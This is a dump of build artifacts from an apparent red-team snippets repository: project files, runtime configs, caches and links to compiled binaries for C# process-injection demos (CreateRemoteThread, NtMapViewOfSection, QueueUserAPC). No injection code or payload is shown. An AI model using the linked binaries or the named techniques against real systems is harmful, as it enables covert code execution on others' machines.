https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/PInvoke/PInvoke/obj/Debug/netcoreapp3.1/PInvoke.dll -------------------------------------------------------------------------------- 
/C#/PInvoke/PInvoke/obj/Debug/netcoreapp3.1/PInvoke.genruntimeconfig.cache: -------------------------------------------------------------------------------- 1 | 9ef52f5bd7f4cff3d652c0e7935269a83934d959 2 | -------------------------------------------------------------------------------- /C#/PInvoke/PInvoke/obj/Debug/netcoreapp3.1/PInvoke.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/PInvoke/PInvoke/obj/Debug/netcoreapp3.1/PInvoke.pdb -------------------------------------------------------------------------------- /C#/PInvoke/PInvoke/obj/Debug/netcoreapp3.1/apphost.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/PInvoke/PInvoke/obj/Debug/netcoreapp3.1/apphost.exe -------------------------------------------------------------------------------- /C#/PInvoke/PInvoke/obj/PInvoke.csproj.nuget.g.targets: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | $(MSBuildAllProjects);$(MSBuildThisFileFullPath) 5 | 6 | -------------------------------------------------------------------------------- /C#/PInvoke/PInvoke/obj/project.nuget.cache: -------------------------------------------------------------------------------- 1 | { 2 | "version": 2, 3 | "dgSpecHash": "yDtPFkmmK0x6Bj1ejJZrdurmesNI0rv96zUDh+/MJumZu2Dpwe/87a+H9GWhqp47DKyxck1DYE+fN/Hh/cSLjg==", 4 | "success": true, 5 | "projectFilePath": "C:\\Users\\0xtriboulet\\Documents\\cs-progs\\PInvoke\\PInvoke\\PInvoke.csproj", 6 | "expectedPackageFiles": [], 7 | "logs": [] 8 | } -------------------------------------------------------------------------------- /C#/PInvoke/Readme.md: -------------------------------------------------------------------------------- 1 | 2 | 
-------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_CreateRemoteThread/ConsoleApp1/ConsoleApp1/ConsoleApp1.csproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Exe 5 | netcoreapp3.1 6 | 7 | 8 | 9 | -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_CreateRemoteThread/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.deps.json: -------------------------------------------------------------------------------- 1 | { 2 | "runtimeTarget": { 3 | "name": ".NETCoreApp,Version=v3.1", 4 | "signature": "" 5 | }, 6 | "compilationOptions": {}, 7 | "targets": { 8 | ".NETCoreApp,Version=v3.1": { 9 | "ConsoleApp1/1.0.0": { 10 | "runtime": { 11 | "ConsoleApp1.dll": {} 12 | } 13 | } 14 | } 15 | }, 16 | "libraries": { 17 | "ConsoleApp1/1.0.0": { 18 | "type": "project", 19 | "serviceable": false, 20 | "sha512": "" 21 | } 22 | } 23 | } -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_CreateRemoteThread/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/ProcessInjection/ProcessInjection_CreateRemoteThread/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.dll -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_CreateRemoteThread/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.exe: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/ProcessInjection/ProcessInjection_CreateRemoteThread/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.exe -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_CreateRemoteThread/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/ProcessInjection/ProcessInjection_CreateRemoteThread/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.pdb -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_CreateRemoteThread/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.runtimeconfig.dev.json: -------------------------------------------------------------------------------- 1 | { 2 | "runtimeOptions": { 3 | "additionalProbingPaths": [ 4 | "C:\\Users\\0xtriboulet\\.dotnet\\store\\|arch|\\|tfm|", 5 | "C:\\Users\\0xtriboulet\\.nuget\\packages" 6 | ] 7 | } 8 | } -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_CreateRemoteThread/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.runtimeconfig.json: -------------------------------------------------------------------------------- 1 | { 2 | "runtimeOptions": { 3 | "tfm": "netcoreapp3.1", 4 | "framework": { 5 | "name": "Microsoft.NETCore.App", 6 | "version": "3.1.0" 7 | } 8 | } 9 | } -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_CreateRemoteThread/ConsoleApp1/ConsoleApp1/obj/ConsoleApp1.csproj.nuget.g.targets: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 
$(MSBuildAllProjects);$(MSBuildThisFileFullPath) 5 | 6 | -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_CreateRemoteThread/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.AssemblyInfoInputs.cache: -------------------------------------------------------------------------------- 1 | 0cbac02cf6b33ab9449e1ec02e8dbba2474e8080 2 | -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_CreateRemoteThread/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.GeneratedMSBuildEditorConfig.editorconfig: -------------------------------------------------------------------------------- 1 | is_global = true 2 | build_property.RootNamespace = ConsoleApp1 3 | build_property.ProjectDir = C:\Users\0xtriboulet\Documents\cs-progs\ProcessInjection_CreateRemoteThread\ConsoleApp1\ConsoleApp1\ 4 | -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_CreateRemoteThread/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.assets.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/ProcessInjection/ProcessInjection_CreateRemoteThread/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.assets.cache -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_CreateRemoteThread/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.csproj.CoreCompileInputs.cache: -------------------------------------------------------------------------------- 1 | 2daac1f55b0f9263d04ca399f0ab1f7cfe7a4d3e 2 | -------------------------------------------------------------------------------- 
/C#/ProcessInjection/ProcessInjection_CreateRemoteThread/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/ProcessInjection/ProcessInjection_CreateRemoteThread/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.dll -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_CreateRemoteThread/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.genruntimeconfig.cache: -------------------------------------------------------------------------------- 1 | 3914a16dc66868dc2364d6ffe4a1fc74b6920dcb 2 | -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_CreateRemoteThread/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/ProcessInjection/ProcessInjection_CreateRemoteThread/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.pdb -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_CreateRemoteThread/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/apphost.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/ProcessInjection/ProcessInjection_CreateRemoteThread/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/apphost.exe -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_CreateRemoteThread/ConsoleApp1/ConsoleApp1/obj/project.nuget.cache: 
-------------------------------------------------------------------------------- 1 | { 2 | "version": 2, 3 | "dgSpecHash": "69n3ZJsUquHc4sOxi/CNchuohQhlJ+YJdDUezVnncW81sNReBiw65j6wg0uOTtyKpJLp0yACMx37kyAUhkLhiw==", 4 | "success": true, 5 | "projectFilePath": "C:\\Users\\0xtriboulet\\Documents\\cs-progs\\ProcessInjection_CreateRemoteThread\\ConsoleApp1\\ConsoleApp1\\ConsoleApp1.csproj", 6 | "expectedPackageFiles": [], 7 | "logs": [] 8 | } -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_CreateThread/ConsoleApp1/ConsoleApp1/ConsoleApp1.csproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Exe 5 | netcoreapp3.1 6 | 7 | 8 | 9 | -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_CreateThread/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.deps.json: -------------------------------------------------------------------------------- 1 | { 2 | "runtimeTarget": { 3 | "name": ".NETCoreApp,Version=v3.1", 4 | "signature": "" 5 | }, 6 | "compilationOptions": {}, 7 | "targets": { 8 | ".NETCoreApp,Version=v3.1": { 9 | "ConsoleApp1/1.0.0": { 10 | "runtime": { 11 | "ConsoleApp1.dll": {} 12 | } 13 | } 14 | } 15 | }, 16 | "libraries": { 17 | "ConsoleApp1/1.0.0": { 18 | "type": "project", 19 | "serviceable": false, 20 | "sha512": "" 21 | } 22 | } 23 | } -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_CreateThread/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/ProcessInjection/ProcessInjection_CreateThread/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.dll 
-------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_CreateThread/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/ProcessInjection/ProcessInjection_CreateThread/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.exe -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_CreateThread/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/ProcessInjection/ProcessInjection_CreateThread/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.pdb -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_CreateThread/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.runtimeconfig.dev.json: -------------------------------------------------------------------------------- 1 | { 2 | "runtimeOptions": { 3 | "additionalProbingPaths": [ 4 | "C:\\Users\\0xtriboulet\\.dotnet\\store\\|arch|\\|tfm|", 5 | "C:\\Users\\0xtriboulet\\.nuget\\packages" 6 | ] 7 | } 8 | } -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_CreateThread/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.runtimeconfig.json: -------------------------------------------------------------------------------- 1 | { 2 | "runtimeOptions": { 3 | "tfm": "netcoreapp3.1", 4 | "framework": { 5 | "name": "Microsoft.NETCore.App", 6 | "version": "3.1.0" 7 | } 8 | } 9 | } 
-------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_CreateThread/ConsoleApp1/ConsoleApp1/obj/ConsoleApp1.csproj.nuget.g.targets: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | $(MSBuildAllProjects);$(MSBuildThisFileFullPath) 5 | 6 | -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_CreateThread/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.AssemblyInfoInputs.cache: -------------------------------------------------------------------------------- 1 | 0cbac02cf6b33ab9449e1ec02e8dbba2474e8080 2 | -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_CreateThread/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.GeneratedMSBuildEditorConfig.editorconfig: -------------------------------------------------------------------------------- 1 | is_global = true 2 | build_property.RootNamespace = ConsoleApp1 3 | build_property.ProjectDir = C:\Users\0xtriboulet\Documents\cs-progs\ProcessInjection_CreateThread\ConsoleApp1\ConsoleApp1\ 4 | -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_CreateThread/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.assets.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/ProcessInjection/ProcessInjection_CreateThread/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.assets.cache -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_CreateThread/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.csproj.CoreCompileInputs.cache: 
-------------------------------------------------------------------------------- 1 | 2daac1f55b0f9263d04ca399f0ab1f7cfe7a4d3e 2 | -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_CreateThread/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/ProcessInjection/ProcessInjection_CreateThread/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.dll -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_CreateThread/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.genruntimeconfig.cache: -------------------------------------------------------------------------------- 1 | e744f908d881bf42cab133eb47ad3549e1832016 2 | -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_CreateThread/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/ProcessInjection/ProcessInjection_CreateThread/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.pdb -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_CreateThread/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/apphost.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/ProcessInjection/ProcessInjection_CreateThread/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/apphost.exe 
-------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_CreateThread/ConsoleApp1/ConsoleApp1/obj/project.nuget.cache: -------------------------------------------------------------------------------- 1 | { 2 | "version": 2, 3 | "dgSpecHash": "T5DCfvOqD/FmHEOz/I1KvKlgHbnKKs7Ont7s1fKDrylAu8i7pL5K61si8oGNungJMlNsJZEq9ejv5J+oBIPQDA==", 4 | "success": true, 5 | "projectFilePath": "C:\\Users\\0xtriboulet\\Documents\\cs-progs\\ProcessInjection_CreateThread\\ConsoleApp1\\ConsoleApp1\\ConsoleApp1.csproj", 6 | "expectedPackageFiles": [], 7 | "logs": [] 8 | } -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_NtMapViewOfSection/ConsoleApp1/ConsoleApp1/ConsoleApp1.csproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Exe 5 | netcoreapp3.1 6 | 7 | 8 | 9 | -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_NtMapViewOfSection/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.deps.json: -------------------------------------------------------------------------------- 1 | { 2 | "runtimeTarget": { 3 | "name": ".NETCoreApp,Version=v3.1", 4 | "signature": "" 5 | }, 6 | "compilationOptions": {}, 7 | "targets": { 8 | ".NETCoreApp,Version=v3.1": { 9 | "ConsoleApp1/1.0.0": { 10 | "runtime": { 11 | "ConsoleApp1.dll": {} 12 | } 13 | } 14 | } 15 | }, 16 | "libraries": { 17 | "ConsoleApp1/1.0.0": { 18 | "type": "project", 19 | "serviceable": false, 20 | "sha512": "" 21 | } 22 | } 23 | } -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_NtMapViewOfSection/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.dll: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/ProcessInjection/ProcessInjection_NtMapViewOfSection/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.dll -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_NtMapViewOfSection/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/ProcessInjection/ProcessInjection_NtMapViewOfSection/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.exe -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_NtMapViewOfSection/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/ProcessInjection/ProcessInjection_NtMapViewOfSection/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.pdb -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_NtMapViewOfSection/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.runtimeconfig.dev.json: -------------------------------------------------------------------------------- 1 | { 2 | "runtimeOptions": { 3 | "additionalProbingPaths": [ 4 | "C:\\Users\\0xtriboulet\\.dotnet\\store\\|arch|\\|tfm|", 5 | "C:\\Users\\0xtriboulet\\.nuget\\packages" 6 | ] 7 | } 8 | } -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_NtMapViewOfSection/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.runtimeconfig.json: 
-------------------------------------------------------------------------------- 1 | { 2 | "runtimeOptions": { 3 | "tfm": "netcoreapp3.1", 4 | "framework": { 5 | "name": "Microsoft.NETCore.App", 6 | "version": "3.1.0" 7 | } 8 | } 9 | } -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_NtMapViewOfSection/ConsoleApp1/ConsoleApp1/obj/ConsoleApp1.csproj.nuget.g.targets: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | $(MSBuildAllProjects);$(MSBuildThisFileFullPath) 5 | 6 | -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_NtMapViewOfSection/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.AssemblyInfoInputs.cache: -------------------------------------------------------------------------------- 1 | 0cbac02cf6b33ab9449e1ec02e8dbba2474e8080 2 | -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_NtMapViewOfSection/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.GeneratedMSBuildEditorConfig.editorconfig: -------------------------------------------------------------------------------- 1 | is_global = true 2 | build_property.RootNamespace = ConsoleApp1 3 | build_property.ProjectDir = C:\Users\0xtriboulet\Documents\cs-progs\ProcessInjection_NtMapViewOfSection\ConsoleApp1\ConsoleApp1\ 4 | -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_NtMapViewOfSection/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.assets.cache: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/ProcessInjection/ProcessInjection_NtMapViewOfSection/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.assets.cache -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_NtMapViewOfSection/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.csproj.CoreCompileInputs.cache: -------------------------------------------------------------------------------- 1 | 2daac1f55b0f9263d04ca399f0ab1f7cfe7a4d3e 2 | -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_NtMapViewOfSection/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/ProcessInjection/ProcessInjection_NtMapViewOfSection/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.dll -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_NtMapViewOfSection/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.genruntimeconfig.cache: -------------------------------------------------------------------------------- 1 | dbc5f2d2dde9ded4efa7a46af73bce5b7462ad86 2 | -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_NtMapViewOfSection/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/ProcessInjection/ProcessInjection_NtMapViewOfSection/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.pdb 
-------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_NtMapViewOfSection/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/apphost.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/ProcessInjection/ProcessInjection_NtMapViewOfSection/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/apphost.exe -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_NtMapViewOfSection/ConsoleApp1/ConsoleApp1/obj/project.nuget.cache: -------------------------------------------------------------------------------- 1 | { 2 | "version": 2, 3 | "dgSpecHash": "totIWlSrHR+s/eXPcnyaBqwVDT6uhdqNbTAl6ILr+g9i1VvqoIiI4ARBQFdwMuVgV3J/+vWZjp4rro2G2E4mfQ==", 4 | "success": true, 5 | "projectFilePath": "C:\\Users\\0xtriboulet\\Documents\\cs-progs\\ProcessInjection_NtMapViewOfSection\\ConsoleApp1\\ConsoleApp1\\ConsoleApp1.csproj", 6 | "expectedPackageFiles": [], 7 | "logs": [] 8 | } -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_QueueUserAPC/ConsoleApp1/ConsoleApp1/ConsoleApp1.csproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Exe 5 | netcoreapp3.1 6 | 7 | 8 | 9 | -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_QueueUserAPC/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.deps.json: -------------------------------------------------------------------------------- 1 | { 2 | "runtimeTarget": { 3 | "name": ".NETCoreApp,Version=v3.1", 4 | "signature": "" 5 | }, 6 | "compilationOptions": {}, 7 | "targets": { 8 | ".NETCoreApp,Version=v3.1": { 9 | "ConsoleApp1/1.0.0": { 10 | "runtime": { 11 | "ConsoleApp1.dll": {} 12 | } 13 | } 14 | } 
15 | }, 16 | "libraries": { 17 | "ConsoleApp1/1.0.0": { 18 | "type": "project", 19 | "serviceable": false, 20 | "sha512": "" 21 | } 22 | } 23 | } -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_QueueUserAPC/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/ProcessInjection/ProcessInjection_QueueUserAPC/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.dll -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_QueueUserAPC/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/ProcessInjection/ProcessInjection_QueueUserAPC/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.exe -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_QueueUserAPC/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/ProcessInjection/ProcessInjection_QueueUserAPC/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.pdb -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_QueueUserAPC/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.runtimeconfig.dev.json: -------------------------------------------------------------------------------- 1 | { 2 | "runtimeOptions": { 3 | 
"additionalProbingPaths": [ 4 | "C:\\Users\\0xtriboulet\\.dotnet\\store\\|arch|\\|tfm|", 5 | "C:\\Users\\0xtriboulet\\.nuget\\packages" 6 | ] 7 | } 8 | } -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_QueueUserAPC/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.runtimeconfig.json: -------------------------------------------------------------------------------- 1 | { 2 | "runtimeOptions": { 3 | "tfm": "netcoreapp3.1", 4 | "framework": { 5 | "name": "Microsoft.NETCore.App", 6 | "version": "3.1.0" 7 | } 8 | } 9 | } -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_QueueUserAPC/ConsoleApp1/ConsoleApp1/obj/ConsoleApp1.csproj.nuget.g.targets: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | $(MSBuildAllProjects);$(MSBuildThisFileFullPath) 5 | 6 | -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_QueueUserAPC/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.AssemblyInfoInputs.cache: -------------------------------------------------------------------------------- 1 | 0cbac02cf6b33ab9449e1ec02e8dbba2474e8080 2 | -------------------------------------------------------------------------------- /C#/ProcessInjection/ProcessInjection_QueueUserAPC/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.GeneratedMSBuildEditorConfig.editorconfig: -------------------------------------------------------------------------------- 1 | is_global = true 2 | build_property.RootNamespace = ConsoleApp1 3 | build_property.ProjectDir = C:\Users\0xtriboulet\Documents\cs-progs\ProcessInjection_QueueUserAPC\ConsoleApp1\ConsoleApp1\ 4 | -------------------------------------------------------------------------------- 
